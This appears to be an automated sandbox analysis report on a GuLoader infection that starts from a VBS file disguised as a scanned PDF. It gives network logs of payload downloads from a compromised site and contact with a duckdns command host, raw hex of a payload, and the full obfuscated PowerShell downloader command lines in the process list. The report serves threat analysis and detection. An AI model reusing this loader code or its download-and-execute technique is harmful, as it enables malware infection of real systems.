Oct 21, 2024 17:07:56.008833885 CEST | 1.1.1.1 | 192.168.2.11 | 0xd6b2 | No error (0) | blackass.duckdns.org | | 193.187.91.214 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:07:58.536153078 CEST | 1.1.1.1 | 192.168.2.11 | 0x8a05 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                              • www.groupriam.com
                                                              • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49977 | 178.237.33.50 | 80 | 7092 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:07:58.544473886 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                              Host: geoplugin.net
                                                              Cache-Control: no-cache
Oct 21, 2024 17:07:59.126180887 CEST | 1168 | IN | HTTP/1.1 200 OK
                                                              date: Mon, 21 Oct 2024 15:07:59 GMT
                                                              server: Apache
                                                              content-length: 960
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Ascii: { "geoplugin_request":"216.52.183.150", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7157", "geoplugin_longitude":"-74", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49736 | 199.103.62.205 | 443 | 7972 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-21 15:07:03 UTC | 181 | OUT | GET /Mandschauvinisme.snp HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: www.groupriam.com
                                                              Connection: Keep-Alive
2024-10-21 15:07:04 UTC | 422 | IN | HTTP/1.1 200 OK
                                                              Connection: close
                                                              content-type: application/octet-stream
                                                              last-modified: Mon, 21 Oct 2024 09:19:43 GMT
                                                              accept-ranges: bytes
                                                              content-length: 499656
                                                              date: Mon, 21 Oct 2024 15:07:03 GMT
                                                              server: LiteSpeed
                                                              vary: User-Agent
                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49973 | 199.103.62.205 | 443 | 7092 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-21 15:07:52 UTC | 174 | OUT | GET /PrOrl135.bin HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: www.groupriam.com
                                                              Cache-Control: no-cache
2024-10-21 15:07:53 UTC | 422 | IN | HTTP/1.1 200 OK
                                                              Connection: close
                                                              content-type: application/octet-stream
                                                              last-modified: Mon, 21 Oct 2024 09:16:16 GMT
                                                              accept-ranges: bytes
                                                              content-length: 494656
                                                              date: Mon, 21 Oct 2024 15:07:52 GMT
                                                              server: LiteSpeed
                                                              vary: User-Agent
                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                              Data Ascii: gG>VjXl5CI31mBwa]m?1T`pubJ?l^~DS8i0k:{q%TfgZ9.[IJ!yADDW[#9^5k=o?jFZp6% WnX&+b(QI>Bd/Fy\79m
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 1f 07 2d c6 b9 cb c1 20 4a 47 fe 59 98 e2 5a 74 3a d0 56 b0 46 93 8a 92 5a 22 57 ed e3 11 36 85 6e e4 15 69 d4 ce a8 9a 5a b8 59 6b 5a cb 0e 1d 2a d0 a8 50 73 95 f7 84 e3 d7 1d 61 08 2d 93 42 ad 01 8b ff c0 94 90 03 42 35 05 3e 96 59 54 d9 c5 d3 7c d0 98 5c 59 5c 02 ee 57 cd 86 62 cf 67 40 e5 6e a1 ab c2 5d ea 00 bf 86 32 c5 1f a8 e5 79 ef 51 f0 8d 84 98 8a a9 a4 da 12 e0 e1 a7 db e9 a5 96 73 ce e5 f6 af 64 cd 42 51 5d 7d 3f 03 46 87 57 1e ed b5 ae 0b f7 b4 83 5d 60 a2 8d d3 6e 98 3a 46 78 68 7d 70 74 2d 69 be 06 42 b7 7a 29 80 44 53 ae fd 96 5f 2c 55 b6 b6 a8 90 73 f5 15 26 f3 de 4a a6 86 f1 44 72 8b 38 9f ec 17 fb f1 f1 ca 45 3f 19 5e a5 0c 3b 75 99 19 1b a0 42 d4 ee 4c fa 50 5e 96 c4 6b 83 b7 a9 5d db e2 aa 36 74 5a 6a ed d3 38 73 93 7a 2d dd bb 80 02
                                                              Data Ascii: - JGYZt:VFZ"W6niZYkZ*Psa-BB5>YT|\Y\Wbg@n]2yQsdBQ]}?FW]`n:Fxh}pt-iBz)DS_,Us&JDr8E?^;uBLP^k]6tZj8sz-
                                                              2024-10-21 15:07:53 UTC16384INData Raw: f7 79 a3 c7 a7 27 f6 86 de 5a a3 03 d0 29 cc c0 5a 02 d4 3c 99 1f 2a c1 f9 a5 91 46 57 65 47 c7 54 c1 f0 8d 29 17 d9 ca ae 41 6d a8 53 3a 5b 02 9f 8e b2 30 d0 33 e0 69 47 6c ed ed 5a 94 c2 99 aa fe a8 8a cc 7f 1f 0e ed 4a 34 60 87 26 2e 69 6f db 58 2a 7d 6f 7c 83 e0 bf f4 28 b0 e7 a2 8d dc e1 aa 85 3f c5 18 a4 7f 92 1e d0 5e ed 0d 65 97 36 9d 38 5d 2c 53 b9 5b 07 dc b3 f7 5c 38 f7 83 b0 93 9b 31 72 86 d3 11 24 e7 2f a0 84 62 8d b2 62 ae 49 6a c9 6f e4 56 91 d9 f5 61 79 36 09 8e 34 84 76 1b 35 a5 b6 5d ce 2a 89 ae d8 33 82 a2 8e 89 df c1 75 8a 73 26 51 12 52 ea 18 01 94 67 22 1e 67 cb 6e f0 8f 1a a7 f4 66 18 c4 2e bc 38 76 55 76 d7 64 4c af 2a 08 f7 dc ec 77 03 12 e6 54 d7 16 27 e2 b0 26 d0 ef 8c e7 8b d9 d6 1b 6d 93 a7 75 8e a7 3e 2c c4 55 bb 1e 63 4f 54
                                                              Data Ascii: y'Z)Z<*FWeGT)AmS:[03iGlZJ4`&.ioX*}o|(?^e68],S[\81r$/bbIjoVay64v5]*3us&QRg"gnf.8vUvdL*wT'&mu>,UcOT
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 90 8c 4d e9 01 3d 21 b3 6e 44 10 fa 6f 60 b8 15 59 11 33 78 4f 41 44 64 1e a9 46 25 f8 18 48 ef c5 20 12 dc 96 13 af de 04 91 20 81 bd 80 39 90 59 1c 0f b5 66 53 40 f2 b5 9d a7 66 42 80 57 36 30 08 2f 63 73 77 27 9e 76 13 bb 19 42 af 86 1c fd 59 a5 97 ca 6f c0 90 b0 4b 0e f0 1a 62 9b 7b cd 28 08 d5 dc 52 c9 82 9d f8 3e fd da 54 1f b8 cd ba 7a d4 87 54 c1 ec 21 2b 82 54 d5 25 b9 21 3f 06 96 39 23 f7 16 1c 75 6c a0 0d 06 de db 8f 47 f3 75 d4 d4 6a c5 90 32 de a4 54 e8 49 1a de 4d 2c 03 4a 4c 01 cb e9 f4 4d df 88 ff 68 c7 54 e2 77 e2 8d 36 45 91 3e a9 fc 99 53 ac 21 65 92 3e 55 d2 28 4c 6b 96 bb ae 63 62 46 01 6d 83 67 8c d7 49 2f 2b 72 54 d7 a3 2b f6 4e 98 4e 58 af cd 37 62 bd f7 bd 56 5c ad 60 e9 66 e5 94 7b 04 fc 73 f7 bd 0a 40 03 3b 9d 2e ec 4b 2b 8f 1e
                                                              Data Ascii: M=!nDo`Y3xOADdF%H 9YfS@fBW60/csw'vBYoKb{(R>TzT!+T%!?9#ulGuj2TIM,JLMhTw6E>S!e>U(LkcbFmgI/+rT+NNX7bV\`f{s@;.K+
                                                              2024-10-21 15:07:53 UTC16384INData Raw: e3 fd bd 72 70 ce e3 72 88 be 81 6e 9d d1 29 b5 ef 34 be 97 fa fa c1 8c 0b 83 78 98 27 e7 17 38 c6 3c cd 6c 48 31 5d b9 69 70 25 d7 bf 41 55 bb 3c 10 98 4b 9e ef 0a ca 85 15 56 af b7 8c c4 07 72 8e b0 ce 58 86 b6 ac a5 0b f7 8f bd d4 dd 23 a2 1a f4 06 80 5e e2 8d 7c b2 e5 5d c1 76 4c 29 be e8 a9 4e de 01 bf 9f 18 a6 c7 6c 76 84 65 20 82 0b fc 0d 6a c9 83 da 26 c6 9b 7c b0 69 17 b8 39 4f 47 02 e6 c6 ea 96 18 42 d2 9e 62 86 36 2b ef ca 72 83 10 75 1a 20 13 22 31 e6 7f ed c0 61 2c 8e 86 f2 1e 41 39 41 e6 da 7a b8 4c 40 cc 79 98 da 82 6f 98 db 7c 15 e8 e9 02 f4 e0 3c 1e 27 1b a6 6c 6a d2 97 92 b1 25 0a 64 24 65 27 17 9e 02 69 87 5f 48 c3 e0 72 0b 4e 3a 8f a8 18 1e b7 fb 77 7e 33 21 2b 04 e1 7b bb 2f cd 46 25 ca ab e0 94 de be de 84 04 1a 59 60 5c 99 42 28 9b
                                                              Data Ascii: rprn)4x'8<lH1]ip%AU<KVrX#^|]vL)Nlve j&|i9OGBb6+ru "1a,A9AzL@yo|<'lj%d$e'i_HrN:w~3!+{/F%Y`\B(
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 75 87 cd b5 ab ba f8 61 fe 0f 20 e9 21 8f 9b a3 b6 4b 25 f9 3c 68 ca 1b 06 ee ba b0 f6 61 79 36 9e 29 ed 0e 3c d4 f1 bb fe 42 b8 e6 64 d8 72 b4 f6 49 cc 88 8f 29 66 1e 7d a2 50 56 76 f6 1e 28 97 e0 55 9d 84 c9 15 52 c2 de 7b e8 cf bb a6 ef b4 4c 25 ec e5 a7 0f 4c 76 18 c7 e4 91 43 cd 61 0a e9 1f a2 e9 0e 57 71 76 5b e3 9f 37 ea c9 50 1d 4c cf a1 f2 bf 65 4a 2a 1d f9 ce 53 89 69 28 fe db 0e 82 14 5c 86 02 54 07 08 e8 17 59 3d cb 90 4b 78 f8 92 53 d6 e5 45 8d 1d 2e 82 10 f3 9a 6c 6e 41 9a 2e 81 67 7b 02 c3 45 fe 7d 57 69 e9 c4 71 80 b2 db 10 e1 8b bb 1c c1 6c 0e e9 77 ec d3 ca a5 5d b2 d8 fd 65 4e cc bc 27 1c 3a 36 31 6e 43 14 20 3b 23 11 a3 6d 46 86 61 fb e2 45 35 94 95 1f ea e0 db a2 8e b7 2e a2 87 00 b3 52 62 34 85 71 be 10 22 69 f2 3c 7b 94 34 18 8a 07
                                                              Data Ascii: ua !K%<hay6)<BdrI)f}PVv(UR{L%LvCaWqv[7PLeJ*Si(\TY=KxSE.lnA.g{E}Wiqlw]eN':61nC ;#mFaE5.Rb4q"i<{4
                                                              2024-10-21 15:07:53 UTC16384INData Raw: 94 9c 0f ae f5 bb f7 16 0c d9 4d d2 46 72 53 cc 48 9b e6 2a 77 e8 77 4c 5d 58 f5 9d 2f 7b cd 7b d2 fa ca f3 ac 9c 46 9d e5 7f 65 4f 03 bc e3 a4 52 c1 c7 31 6d ba 06 31 83 41 cb 63 45 fd 7e 3b 19 c2 97 3d ab 88 1f 20 36 28 5b b6 e2 61 8a d6 31 8e 24 d9 6b a0 a4 88 a8 39 d4 09 b1 90 d0 09 b7 4f 63 ad aa 87 00 76 fd 27 e7 0e a1 93 9f 18 1b 97 73 a7 aa 2b 9b ac 2f ea 4a da 85 91 8f 11 dc 7d 53 42 2c 05 5f f2 b5 e5 38 38 7c 2f 36 e1 b9 37 c2 7b 48 14 61 87 ab e1 77 62 9b 9c 3e 3d 67 84 89 84 c4 07 1c 3b 20 50 78 be 18 34 56 c9 1e fb 41 82 3b 0d 76 bc 9d 23 66 4c 04 5c d1 97 4f 31 44 d8 25 18 03 16 12 9e e8 81 13 8e 72 8d 9f 63 ca 92 76 e6 44 4b c4 08 35 88 92 81 83 bd da 65 8a 31 45 cf 31 a8 ee eb ba 77 95 d8 75 67 65 d2 9f 2f 54 a4 2e 8e f4 73 82 e6 bd 9a f7
                                                              Data Ascii: MFrSH*wwL]X/{{FeOR1m1AcE~;= 6([a1$k9Ocv's+/J}SB,_88|/67{Hawb>=g; Px4VA;v#fL\O1D%rcvDK5e1E1wuge/T.s



                                                              Target ID:0
                                                              Start time:11:06:56
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs"
                                                              Imagebase:0x7ff6b9b10000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:11:06:58
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\PING.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:ping gormezl_6777.6777.6777.677e
                                                              Imagebase:0x7ff7d89d0000
                                                              File size:22'528 bytes
                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:11:06:58
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff68cce0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:11:06:58
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. 
DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. 
mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;"
                                                              Imagebase:0x7ff6eb350000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:11:06:58
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff68cce0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:11:07:07
                                                              Start date:21/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn 